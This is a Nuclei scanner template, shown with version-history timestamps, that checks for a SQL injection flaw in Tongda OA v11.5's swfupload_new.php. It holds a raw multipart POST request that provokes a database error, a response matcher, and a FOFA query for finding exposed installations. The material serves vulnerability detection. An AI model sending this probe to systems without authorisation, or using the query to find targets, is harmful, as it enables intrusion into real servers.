nuclei-templates/http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml

52 lines
1.7 KiB
YAML
Raw Normal View History

2023-08-18 03:22:06 +00:00
id: tongda-oa-swfupload-sqli
info:
2023-09-06 19:45:50 +00:00
name: Tongda OA v11.5 swfupload_new.php - SQL Injection
2023-08-18 03:22:06 +00:00
author: SleepingBag945
severity: high
2023-09-06 19:45:50 +00:00
description: |
There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability.
2023-08-18 03:22:06 +00:00
reference:
- http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.5%20swfupload_new.php%20SQL注入漏洞.html
2023-09-06 19:45:50 +00:00
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-swfupload-new-sql-inject.yaml
metadata:
2023-10-14 11:27:55 +00:00
verified: true
2023-09-06 19:45:50 +00:00
max-request: 1
fofa-query: app="TDXK-通达OA"
2023-10-14 11:27:55 +00:00
tags: tongda,sqli,intrusive
2023-08-18 03:22:06 +00:00
http:
- raw:
- |
POST /general/file_folder/swfupload_new.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"
1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"
2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"
------------GFioQpMK0vv2--
matchers-condition: and
matchers:
- type: word
words:
2023-09-06 19:45:50 +00:00
- "insert into FILE_CONTENT("
2023-08-18 03:22:06 +00:00
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 4b0a00483046022100d908cad7f3c96fd2b0fcf57c40ed42214aec6f7630b24c0d3f4d90cb36920186022100b86191bc42c231d7024df435a15a8edd194cdd6f61c85da4610a2c324569755c:922c64590222798bb761d5b6d8e72950